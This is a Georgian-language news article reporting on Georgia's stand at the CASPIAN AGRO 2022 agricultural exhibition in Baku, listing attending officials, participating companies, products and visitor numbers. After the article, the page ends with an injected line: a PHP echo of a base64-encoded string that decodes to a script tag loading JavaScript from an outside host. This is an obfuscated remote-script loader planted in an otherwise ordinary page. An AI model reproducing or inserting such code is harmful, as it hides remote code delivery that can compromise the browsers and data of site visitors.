celsiusi
ავერსი საქკაბელი
გარემოს დაცვისა და სოფლის მეურნეობის სამინისტროს მხარდაჭერით და სოფლის განვითარების სააგენტოს ორგანიზებით, აზერბაიჯანში, ქალაქ ბაქოში გამართულ საერთაშორისო გამოფენაზე CASPIAN AGRO 2022  საქართველოს სტენდი გაიხსნა. ქართულმა კომპანიებმა  დამთვალიერებელს სხვადასხვა სახის პროდუქცია გააცნეს. 
 
როგორც საინფორმაციო სააგენტო BUSINESS TIME-ს უწყებიდან აცნობეს, გამოფენის გახსნას საქართველოს გარემოს დაცვისა და სოფლის მეურნეობის მინისტრის პირველი მოადგილე გიორგი ხანიშვილი, აჭარის სოფლის მეურნეობის მინისტრი გიორგი სურმანიძე და საქართველოს საგანგებო და სრულუფლებიანი ელჩი აზერბაიჯანის რესპუბლიკაში, ზურაბ პატარაძე დაესწრნენ.
 
ქართული სტენდი აზერბაიჯანის რესპუბლიკის პრემიერ-მინისტრმა, ალი ასადოვმა დაათვალიერა, რომელმაც ქართველ მეწარმეებს წარმატება უსურვა და საქართველოსა და აზერბაიჯანს შორის მრავალწლიანი მეგობრული ურთიერთობების მნიშვნელობას გაუსვა ხაზი. 
 
CASPIAN AGRO კავკასიის რეგიონში ერთ-ერთი ყველაზე მასშტაბური საერთაშორისო გამოფენაა, სადაც, მსოფლიო მასშტაბით, არაერთი ქვეყანა იღებს მონაწილეობას. გამოფენის ძირითადი მიმართულებებია: სასოფლო-სამეურნეო პროდუქცია, სასოფლო-სამეურნეო ტექნიკა, ინოვაციური ტექნოლოგიები, მეცხოველეობა და მეფრინველეობა, ცხოველთა კვება, მებოსტნეობა, ხილისა და ბოსტნეულის წარმოება და გადამუშავება.
 
გამოფენაზე CASPIAN AGRO 2022  საკუთარი პროდუქცია წარმოდგენილი ჰქონდათ კომპანიებს: შპს ქართული აგროპროდუქტი, შპს ინვეტი, შპს ბადაგი +, შპს რუხი ქვინი, შპს ბლუბერი ფარმი, შპს ჯეონატურალსი, შპს ხილარი, შპს ბენჯი, შპს მომავლის მეღვინეობა,  შპს FOODOLIZ, შპს ჩირიფრუტი, შპს კამპა, შპს MOTION TECHNOLOGY და ნუშისა და კაკლის მწარმოებელთა ასოციაცია. აღნიშნული კომპანიების მიერ გამოფენაზე წარმოდგენილი იყო ქართული ალკოჰოლური სასმელები, კაკალი, მშრალი ხილი, ორგანული წვენები, თაფლი, სხვადასხვა სახის კონსერვები, ცხოველთა კომბინირებული საკვები და სხვა.
 
კომპანიების წარმომადგენელთა განცხადებით, სახელმწიფოს მიერ გამოფენებში ქართველი მწარმოებლების მონაწილეობის მიღების ორგანიზება და მრავალმხრივი მხარდაჭერა, უმნიშვნელოვანესი ფაქტორია ბაზრების დივერსიფიცირების და ქართული აგროსასურსათო პროდუქციის ექსპორტის ზრდის ხელშეწყობისთვის.
 
გამოფენას CASPIAN AGRO, ყოველწლიურად, 12,000-ზე მეტი ვიზიტორი ჰყავს. მიმდინარე წელს, გამოფენაში მონაწილეობას 24 ქვეყანა და სოფლის მეურნეობის სექტორში მოქმედი 450-მდე ადგილობრივი და საერთაშორისო კომპანია იღებს. CASPIAN AGRO 2022 18 მაისს გაიხსნა და 20 მაისს დასრულდება. 
 
681
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");